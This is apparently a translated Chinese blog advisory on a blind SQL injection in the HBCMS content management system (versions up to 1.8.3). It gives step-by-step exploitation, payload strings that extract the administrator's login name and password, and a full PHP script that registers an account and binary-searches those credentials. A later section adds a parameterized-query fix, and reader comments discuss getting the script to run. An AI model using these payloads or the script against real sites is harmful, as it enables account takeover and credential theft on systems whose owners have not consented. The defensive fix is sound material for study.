Source: http://tunps.com/hbcms-list_resource-php-blind-sql-injection
Affected versions:
HBCMS (Hongbo) <= 1.8.3
Vulnerability description:
HBCMS is a fairly well-known PHP content management system in China. It is not open source, and its source code is Zend-encrypted.
When the following three conditions are met, arbitrary sensitive information, such as the administrator account or password, can be obtained through MySQL blind injection:
- user registration is enabled
- file upload is enabled
- the default table prefix (hbcms_) is in use
Exploitation method:
- Register an ordinary member account.
- Upload an image. The image title must match the SQL statement below, e.g. enter "b" as the title.
- In the search bar, enter the following as the title: b%" and (select length(login_name) from hbcms_users where id=1)=5 and "%a%"="%a. If the image is returned, the condition is true; if the text "Nothing here yet!" is returned, it is false.
Test the username length: b%" and (select length(login_name) from hbcms_users where id=1)=5 and "%a%"="%a
Test the password length: b%" and (select length(login_pass) from hbcms_users where id=1)=5 and "%a%"="%a
Test the username content: b%" and (select mid(login_name,1,1) from hbcms_users where id=1) between char(1) and char(255) and "%a%"="%a
Test the password content: b%" and (select mid(login_pass,1,1) from hbcms_users where id=1) between char(1) and char(255) and "%a%"="%a
Demo recording download:
Because manual injection is slow, I wrote a program to assist with the injection, but I debugged the image-upload function for ages without getting it to work, so after registering you have to upload the image by hand, which certainly cuts the efficiency a lot. Nothing to be done about it; my programming skills are limited.
The program's code follows. If you cannot get it to work, or do not understand how to exploit this vulnerability, download the animated demo: http://www.rayfile.com/zh-cn/files/c90682f5-7a42-11df-8103-0015c55db73d/
<?php
/*
 options
 code by tunpishuang[at]gmail.com (tunps.com)
*/
// the list url
$expUrl = $argv[1];
// the user info to be registered
$regUser = 'tun';
$regPass = 'tun';
$regMail = 'tun@tunps.com';
$regUrl = str_replace('list_resource.php', 'register.php', $expUrl);
// options for image upload
$fileDir = '@D:\img\b.jpg';
$fileTitle = 'bbbb';
$fileDesc = 'bbbbbbbbbbb';
$uploadImgUrl = str_replace('list_resource.php', 'add_resource.php', $expUrl);

if ($argc != 3) {
    echo "usage: php.exe script.php url inj/reg \n";
    exit;
}
if ($argv[2] == 'reg') {
    reg($regUrl, $regUser, $regPass, $regMail);
}
// the author says the upload step could not be made to work; upload the image by hand after registering
//uploadImg($uploadImgUrl, $fileDir, $fileTitle, $fileDesc);
if ($argv[2] == 'inj') {
    inj($expUrl);
}

/* register function */
function reg($regurl, $u, $p, $m) {
    $ch = curl_init();
    $urlArr = parse_url($regurl);
    $options = array(
        CURLOPT_URL => $regurl,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => 'mod=register_now&next_url=index.php&addon_app=&referrer_id=&login_name=' . $u . '&login_pass=' . $p . '&confirm_login_pass=' . $p . '&login_email=' . $m . '&nickname=&gender=0&qq=&mobile=&telephone=&true_name=&website_name=&website_url=&my_question=&my_answer=',
        CURLOPT_COOKIESESSION => true,
        CURLOPT_HEADER => true,
        // the session cookie is stored per host and reused by postData()
        CURLOPT_COOKIEJAR => 'c:\\cookie\\' . $urlArr['host'] . '.txt'
    );
    curl_setopt_array($ch, $options);
    $data = curl_exec($ch);
    curl_close($ch);
    // the registration page prints '成功' ("success") when the account was created
    if (strpos($data, '成功') !== false) {
        printf("register ok :)\n");
        return true;
    } else {
        printf("register failed :(\n");
        return false;
    }
}

/* image uploading function (unused: it never worked, see the note above) */
function uploadImg($uploadimgurl, $filedir, $filetitle, $filedesc) {
    $ch = curl_init();
    $options = array(
        CURLOPT_COOKIEFILE => 'c:\cookie.txt',
        CURLOPT_URL => $uploadimgurl,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_POST => 1,
        CURLOPT_POSTFIELDS => http_build_query(array(
            'MAX_FILE_SIZE' => '33554432',
            'preview_area_id' => 'upload_file',
            'editor_area_id' => 'body',
            'js_function' => '',
            'resource_id' => '',
            'show_top_part' => 'no',
            'file_1' => $filedir,
            'file_title_1' => $filetitle,
            'file_desc_1' => $filedesc
        ))
    );
    curl_setopt_array($ch, $options);
    $data = curl_exec($ch);
    // the page prints '注意' ("notice") after a successful upload
    if (strpos($data, '注意') !== false) {
        printf("upload ok :)\n");
    } else {
        printf("upload failed :(\n");
    }
    curl_close($ch);
}

/* binary search for the length of $field in the row with id=1 */
function getLength($expurl, $min, $max, $field) {
    while ($min < $max) {
        $mid = (int) floor(($min + $max) / 2);
        // probe the halves [min, mid] and [mid+1, max]; the original used [mid, max] for the
        // right half, which loops forever when the value equals $max
        $leftStr = 'b%" and (select length(' . $field . ') from hbcms_users where id=1) between ' . $min . ' and ' . $mid . ' and "%a%"="%a';
        $rightStr = 'b%" and (select length(' . $field . ') from hbcms_users where id=1) between ' . ($mid + 1) . ' and ' . $max . ' and "%a%"="%a';
        if (postData($expurl, $leftStr)) {
            $max = $mid;
        } elseif (postData($expurl, $rightStr)) {
            $min = $mid + 1;
        } else {
            // neither half matched: the value is outside [min, max] or the request failed
            return false;
        }
        echo "min=" . $min . "\n";
        echo "mid=" . $mid . "\n";
        echo "max=" . $max . "\n";
    }
    return $min;
}

/* binary search each of the $len characters of $field, one at a time */
function getStr($expurl, $min, $max, $field, $len) {
    $str = '';
    for ($i = 1; $i <= $len; $i++) {
        while ($min < $max) {
            $mid = (int) floor(($min + $max) / 2);
            $leftNameStr = 'b%" and (select mid(' . $field . ',' . $i . ',1) from hbcms_users where id=1) between char(' . $min . ') and char(' . $mid . ') and "%a%"="%a';
            $rightNameStr = 'b%" and (select mid(' . $field . ',' . $i . ',1) from hbcms_users where id=1) between char(' . ($mid + 1) . ') and char(' . $max . ') and "%a%"="%a';
            if (postData($expurl, $leftNameStr)) {
                $max = $mid;
            } elseif (postData($expurl, $rightNameStr)) {
                $min = $mid + 1;
            } else {
                return false;
            }
            echo "min=" . $min . "\n";
            echo "mid=" . $mid . "\n";
            echo "max=" . $max . "\n";
        }
        echo chr($min);
        $str .= chr($min);
        // reset the printable-ASCII range for the next character
        $min = 32;
        $max = 126;
    }
    return $str;
}

function inj($expurl) {
    // ascii code range from 32 to 126
    // login_name length range from 2 to 20
    // login_pass length range from 5 to 30
    $minNameLen = 2;
    $maxNameLen = 20;
    $minPassLen = 1;
    $maxPassLen = 33;
    $minAscii = 32;
    $maxAscii = 126;
    // assign first, then echo: the original wrote echo 'x:' . $var = f(), which PHP 5
    // rejects with the parse error quoted in the comments below
    $nameLen = getLength($expurl, $minNameLen, $maxNameLen, 'login_name');
    echo 'login name length:' . $nameLen . "\n";
    $loginValue = getStr($expurl, $minAscii, $maxAscii, 'login_name', $nameLen);
    echo "\n" . 'login name value :' . $loginValue . "\n";
    $passLen = getLength($expurl, $minPassLen, $maxPassLen, 'login_pass');
    echo 'password length :' . $passLen . "\n";
    $passValue = getStr($expurl, $minAscii, $maxAscii, 'login_pass', $passLen);
    echo "\n" . 'password value :' . $passValue . "\n";
    echo "\n" . 'login name value :' . $loginValue;
}

/* send one probe as the search title; true when the image came back, false on "Nothing here yet!" */
function postData($expurl, $sqlstr) {
    $ch = curl_init();
    $urlArr = parse_url($expurl);
    $options = array(
        CURLOPT_COOKIEFILE => 'c:\\cookie\\' . $urlArr['host'] . '.txt',
        CURLOPT_URL => $expurl,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_POST => 1,
        CURLOPT_POSTFIELDS => http_build_query(array(
            'editor_mark' => '',
            'js_function' => '',
            'show_top_part' => 'yes',
            'total_file_num' => '',
            'pageID' => 1,
            'category_id' => 'all',
            'file_type' => 0,
            'title' => $sqlstr
        ))
    );
    curl_setopt_array($ch, $options);
    $data = curl_exec($ch);
    // the original closed the handle after the return statements, i.e. never
    curl_close($ch);
    if (strpos($data, 'Nothing') !== false) {
        return false;
    } else {
        return true;
    }
}
Vendor patch:
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://www.hbcms.com/
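The root cause the payloads above exploit is the search title being spliced into the SQL text of the LIKE clause, so the "image returned / Nothing here yet!" difference becomes a boolean oracle over any table. The following is an added example of how such a title search is written so that the oracle disappears; it is not HBCMS code, and the table name hbcms_resources, the column names, the query shape and the connection details are assumptions inferred from the payloads:

```php
<?php
// Added example, not HBCMS code: a safe version of the kind of title search
// that the payloads in this advisory abuse. The table name hbcms_resources,
// the columns and the query shape are assumptions inferred from the payloads.
//
// Assumed vulnerable pattern: the title is pasted into the SQL text, so a
// title that ends with a double quote closes the LIKE literal and the rest
// of the input is executed as SQL:
//   $sql = 'SELECT id, title FROM hbcms_resources WHERE title LIKE "%' . $title . '%"';

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Escape the LIKE metacharacters (% and _) and the backslash, which is
// MySQL's default LIKE escape character, so the input cannot widen the match.
function likeLiteral(string $input): string
{
    return '%' . addcslashes($input, '\\%_') . '%';
}

// Run the title search with bound parameters. The pattern travels to MySQL
// as data, so nothing the user types can change the statement structure, and
// the "image returned / Nothing here yet!" difference no longer says anything
// about other tables.
function searchResources(mysqli $db, string $title, int $page, int $perPage = 20): array
{
    $offset = max(0, $page - 1) * $perPage;
    $stmt = $db->prepare(
        'SELECT id, title FROM hbcms_resources WHERE title LIKE ? LIMIT ?, ?'
    );
    $pattern = likeLiteral($title);
    $stmt->bind_param('sii', $pattern, $offset, $perPage);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage with assumed connection details. The advisory's length probe is just
// an ordinary search string here: it matches no title, and the response
// depends only on hbcms_resources, never on hbcms_users.
$db = new mysqli('localhost', 'hbcms', 'secret', 'hbcms');
$db->set_charset('utf8mb4');
$probe = 'b%" and (select length(login_name) from hbcms_users where id=1)=5 and "%a%"="%a';
$rows = searchResources($db, $probe, 1);
echo count($rows) === 0 ? "Nothing here yet!\n" : count($rows) . " match(es)\n";
```

With the parameter bound, the probe and its negation both return the same "Nothing here yet!" page, which is exactly the property the blind-injection script depends on not having.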

Obviously this exp is unusable!
It has been tested and it works; it is just rather marginal and hard to exploit in practice.
Parse error: syntax error, unexpected '=', expecting ')' in C:\phpnow\php-5.2.14-Win32\hd.php on line 44
There is no curl_init() function. Please post your EXP, thanks.
Using the curl_init() function requires enabling PHP's curl extension.
Method: edit php.ini and enable
extension=php_curl.dll